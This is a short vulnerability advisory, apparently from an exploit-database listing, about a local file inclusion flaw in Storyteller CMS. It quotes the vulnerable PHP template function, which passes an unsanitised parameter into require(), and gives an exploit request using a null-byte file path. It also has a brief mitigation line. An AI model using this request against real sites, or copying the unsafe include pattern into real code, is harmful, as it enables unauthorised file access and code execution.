Storyteller CMS (var) Local File Include Vuln

vendor:

Storyteller CMS

by:

BorN To K!LL - h4ck3r

8,8

CVSS

HIGH

Local File Include

CWE

Product Name: Storyteller CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

n/a

Storyteller CMS (var) Local File Include Vuln

The Storyteller CMS is vulnerable to a Local File Include vulnerability due to the lack of sanitization of the 'var' parameter in the GetTemplate function. An attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious file path in the 'var' parameter. This will allow the attacker to include a malicious file from the local system, resulting in arbitrary code execution.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.

Source

Exploit-DB raw data:

==
[~] Title: Storyteller CMS (var) Local File Include Vuln
[~] Version: n/a
[~] Link: http://www.esselbach.com/freeware.php?id=2
==
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: SQL@hotmail.co.uk
==
[~] Vuln code:
in GetTemplate function , line 113 to 127

    function GetTemplate($var)
    {               
        if (file_exists("templates/$var.tmp.php"))
        {
            require("templates/$var.tmp.php");
        }
        else
        {
            die ("Error: Can't open template $var");
        }        
        return $EST_TEMPLATE;                 
    }

[~] 3xploit:
/core.php?var=[Local-File]%00
==
[#] Greetings:

Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,,
==